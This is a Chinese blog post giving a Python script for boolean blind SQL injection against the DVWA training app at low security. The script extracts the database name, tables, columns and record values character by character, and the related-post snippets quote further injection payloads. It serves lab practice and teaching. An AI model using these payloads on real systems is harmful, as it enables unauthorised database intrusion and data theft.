DVWA布尔盲注Low级Python脚本

已于 2024-02-21 20:05:12 修改
阅读量2.2k 收藏 1
点赞数 2
文章标签: python 开发语言
于 2024-02-21 18:05:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74485250/article/details/136217699
版权
本文介绍了如何利用Python的requests库执行SQL盲注攻击,通过更改HOST、IP和Cookie,获取DVWA环境中的数据库名称、表数量、字段名、记录数等信息。
摘要由CSDN通过智能技术生成

代码如下:

更改HOST,IP,Cookies即可使用

HOST为DVWA的网页URL

IP为本机IP

请求头中的Cookie改成自己的Cookie

import requests
# 标记符 ☾ ☽
HOST = '127.0.0.1'
IP = '127.0.0.1'
flag = 'User ID exists in the database.'

def AvtExp(url,handers):
    response = requests.get(url=url, headers=headers)
    content = response.content.decode('utf8')
    try:
        LocStart = content.index("<pre>") + 5
        LocEnd = content.index("</pre>")
    except:
        print("判断条件错误!\n请修改Flag值")
    if content[LocStart:LocEnd] == flag:
        return 1

def Baopo(url,Lens,headers):
    Turl = url
    Name = ""
    Ls = []
    for letter in range(97, 97 + 26):
        Ls.append(chr(letter))
    for letter in range(48,48+10):
        Ls.append(chr(letter))
    Ls.append('_')
    Ls.append('')
    for count in range(1,Lens+1):
        for letter in Ls:
            url = Turl[:Turl.index('☾')]+str(count)+Turl[Turl.index('☾')+1:]
            url = url[:url.index('☽')]+letter+url[url.index('☽')+1:]
            if AvtExp(url, headers):
                Name += letter
                break
    return Name

# 判断数据库长度
DataLen = 1
while True:
    url = "http://" + HOST + "/vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D" + str(DataLen) + "%2C1%2C0%29+--+.&Submit=Submit#"
    headers = {
        'Host': IP,
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Referer': f'http://{HOST}/vulnerabilities/sqli_blind/',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': 'PHPSESSID=pd6dirbsl64vvvop6aep7q6gsm; security=low',
        'Connection': 'close'
    }
    if AvtExp(url,headers):
        break
    DataLen += 1

url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+if%28substring%28database%28%29%2C☾%2C1%29%3D%27☽%27%2C1%2C0%29--+.&Submit=Submit#'
DataName = Baopo(url,DataLen,headers)
print(f'数据库名: {DataName}')

# 判断数据库有多少表
TsLen = 1
while True:
    url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+%28select+count%28table_name%29+from+information_schema.tables+where+table_schema+%3D+%27dvwa%27%29%3D{TsLen}--+.&Submit=Submit#'
    if AvtExp(url,headers):
        print(f"当前数据库当下表的数量为: {TsLen}")
        break
    TsLen += 1

for TableCs in range(TsLen):
    # 判断表长度
    TableLen = 1
    while True:
        url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+length%28%28select+table_name+from+information_schema.tables+where+table_schema+%3D+%27dvwa%27+limit+{TableCs}%2C1%29%29%3D{TableLen}--+.&Submit=Submit#'
        if AvtExp(url, headers):
            break
        TableLen += 1

    url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+substring%28%28select+table_name+from+information_schema.tables+where+table_schema+%3D+%27dvwa%27+limit+{TableCs}%2C1%29%2C☾%2C1%29%3D%27☽%27+--+.&Submit=Submit#'
    TableName = Baopo(url,TableLen,headers)
    print(f'数据表{TableCs+1}名: {TableName}')
    # 字段名数量
    ColunmShu= 1
    while True:
        url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+%28select+count%28column_name%29+from+information_schema.columns+where+table_schema+%3D+%27{DataName}%27+and+table_name+%3D+%27{TableName}%27%29%3D{ColunmShu}--+.&Submit=Submit#'
        if AvtExp(url, headers):
            print(f"-{DataName}库下的{TableName}表中有 {ColunmShu} 条字段")
            break
        ColunmShu += 1
    for ColunmCs in range(ColunmShu):
        # 字段名长度
        ColunmLen = 1
        while True:
            url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+length%28%28select+column_name+from+information_schema.columns+where+table_schema+%3D+%27{DataName}%27+and+table_name+%3D+%27{TableName}%27+limit+{ColunmCs}%2C1%29%29%3D{ColunmLen}--+.&Submit=Submit#'
            if AvtExp(url, headers):
                break
            ColunmLen += 1

        # 字段名
        url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+substring%28%28select+column_name+from+information_schema.columns+where+table_schema+%3D+%27{DataName}%27+and+table_name+%3D+%27{TableName}%27+limit+{ColunmCs}%2C1%29%2C☾%2C1%29%3D%27☽%27--+%27.&Submit=Submit#'
        ColumnName = Baopo(url, ColunmLen, headers)
        print(f'数据表{TableName}名的第{ColunmCs+1}个字段名: {ColumnName}')

        # 记录数
        RecodeLen = 1
        while True:
            url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+%28select+count%28{ColumnName}%29+from+{DataName}.{TableName}%29%3D{RecodeLen}--+.&Submit=Submit#'
            if AvtExp(url, headers):
                print(f'数据表{TableName}中有 {RecodeLen} 条记录')
                break
            RecodeLen += 1

        for RecodeCs in range(RecodeLen):
            # 记录的长度
            ValueLen = 0
            while True:
                url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+length%28%28select+{ColumnName}+from+{DataName}.{TableName}+limit+{RecodeCs}%2C1%29%29%3D{ValueLen}--+.&Submit=Submit#'
                if AvtExp(url, headers):
                    break
                ValueLen += 1

            url = f'http://{HOST}/vulnerabilities/sqli_blind/?id=1%27+and+substring%28%28select+{ColumnName}+from+{DataName}.{TableName}+limit+{RecodeCs}%2C1%29%2C☾%2C1%29%3D%27☽%27--+.&Submit=Submit#'
            ValueName = Baopo(url, ValueLen, headers)
            print(f'{DataName}.{TableName}的{ColumnName}字段中的第{RecodeCs+1}条值--> {ValueName}')

 

 

XyLin.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 写的一些ctf脚本
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-06 5883
python 写的一些ctf题脚本记录 import base64 c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt") for i in c: print(chr((i-16) ^ 32), end="") str = "61666374667B317327745F73305F333435797D" for i in range(0, len(str), 2): print(chr(int("0x"+str[i:i+2], 16)),
DVWA别通关教程
m0_67393295的博客
07-28 828
首先选择难度,我们从low开始,如上图所示进行修改目录SQL手工注入过程:lowMediumhighImpossible??SQL 盲注过程:SQL 工具注入工具安装过程:过程:?lowMediumHigh:暴力破解过程:LowMediumHighImpossible命令注入过程:LowMediumHigh:Impossible文件上传过程:LowMediumHighImpossibleXSS漏洞过程:Low(反射型)MediumHigh?ImpossibleLow(存储型)MediumHighImposs
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3332
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
DVWA——SQL盲注(全等
@一只躺平的猪@的博客
07-13 5580
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA盲注详解
qq_45788625的博客
04-18 6631
lowDVWA盲注详解
DVWA之sql注入——盲注
Williamanddog的博客
12-22 3103
DVWA盲注
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本
weixin_45116657的博客
08-25 4661
目录: 一、SQL盲注 SQL盲注与SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注:SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 466
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
Python脚本实现Web漏洞扫描工具
09-21
### Python脚本实现Web漏洞扫描工具 #### 一、项目背景与目的 本文介绍的是一个由作者在毕业设计阶段开发的Web漏洞扫描工具。该工具主要用于检测常见的Web应用安全漏洞,如SQL注入漏洞、SQL盲注漏洞以及跨站脚本...
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2831
DVWA------SQL Injection (Blind)(SQL盲注
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注Low,Medium,High 三个别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
dvwa之SQL盲注
ANDTM的博客
05-30 1013
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注和SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注
DVWA之SQL注入(盲注
天空之蓝的博客
11-17 3008
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA学习之Command Injection命令行注入(python脚本实现)
qq_31426383的博客
12-01 305
DVWA学习之Command Injection命令行注入概述 概述 搭建方法请转至 DVMA学习之安装、环境搭建等。 Brute Force请转至 DVWA学习之Brute Force暴力破解(python脚本实现) 本部分先张贴别人的博客(仅讲解,无脚本实现),后续再贴自己写的 python 脚本。 https://www.cnblogs.com/jojo-feed/p/10172770.html ...
dvwa为例学习简单sql布尔盲注的详细脚本
Lethe's Blog
03-02 2580
0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL盲注: 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上不会直接显示sql执行的结果 ...
python DVWA命令注入POC练习
weixin_56537388的博客
09-10 269
使用payload 127.0.0.1&whoami /user,可以看到SID这个特定值,后面可以根据SID来判断漏洞。源码如上,可以看到对输入没有进行任何过滤,而且将结果输出到界面中。这里同样是抓包,访问DVWA低难度的命令注入。抓包进行分析,根据数据包构建POC。
SQL 盲注 实验
m0_63645854的博客
04-10 419
通过手工 SQL 盲注分别完成 DVWALow,Medium,High 别的 SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 别的 SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1954
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWA靶场-SQL Injection (Blind)SQL注入盲注
最新发布
mlws1900的博客
03-19 1496
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
dvwa sql盲注
08-11
DVWA 中,你可以通过以下步骤进行 SQL 盲注的高练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值